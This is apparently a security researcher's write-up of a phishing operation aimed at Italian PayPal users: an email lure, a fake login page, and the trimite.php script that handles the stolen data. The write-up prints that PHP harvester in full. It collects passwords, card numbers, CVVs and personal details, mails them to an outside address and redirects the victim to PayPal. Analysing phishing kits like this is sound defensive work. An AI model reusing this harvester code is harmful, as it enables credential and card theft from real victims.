Taking a look at the pastote folder we see that he uses a mass mailer script to send the phishing emails.


The email addresses are stored in 30 rar files named pastoteXX.


From 2/3/2012 he started targeting PayPal users, but with a different method. I don't have any of the PayPal phishing emails, but from what is on this site I can guess that he sends an email saying you have received a bonus of 100 euro and that, in order to proceed, you have to log in to your PayPal account (fake link provided) and fill in the form.

When a victim clicks on the link he is redirected to this fake page on the site.


Once logged in



Once the form is filled in and send is clicked, the data is posted to a script called trimite.php, which translated from Romanian means send/forward. This time the data isn't stored in a txt file like before but sent directly to a Fastweb email address, and at the end the victim is redirected to the original site.

$username = $_POST['username'];
$password = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$data = date("l, F d, Y h:i" ,time());
$agent = $_SERVER['HTTP_USER_AGENT'];
$nome = $_POST['nome'];
$cognome = $_POST['cognome'];
$c_tip = $_POST['credit_card_type'];
$cn = $_POST['cc_number'];
$an = $_POST['expdate_year'];
$luna = $_POST['expdate_month'];
$cvv = $_POST['cvv'];
$dob_ziua = $_POST['dob_ziua'];
$dob_luna = $_POST['dob_luna'];
$dob_an = $_POST['dob_an'];

$address1 = $_POST['adresa'];
$zip = $_POST['cod_postal'];
$city = $_POST['oras'];
$state = $_POST['provincie'];

//---Email---//
$email = "--snip--@fastwebmail.it";
$subiect = "$ip:$username:$password";
$headers  = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";

$mesaj_html ="





Indirizzo email $username
Password PayPal $password

Nome $nome
Gnome $cognome
Data di nascita: $dob_ziua:$dob_luna:$dob_an(ziua:luna:an)

Indirizzo $address1
CAP $zip
CittĂ  $city
Provincia $state

Tipo di carta di credito $c_tip
Numero della carta di credito $cn
Data di scadenza $luna/$an
Codice di sicurezza della carta $cvv

IP $ip
Data $data
Browser $agent
"; mail($email, $subiect, $mesaj_html, $headers); header("Location: http://www.paypal.it");

He did a good job of replicating the PayPal login process.

In the stf folder all stolen data is sent to fanemacaz@gmail.com, and the techniques used to trick users are the same as explained previously.

Folder index file.


Folder content.


That's all for now.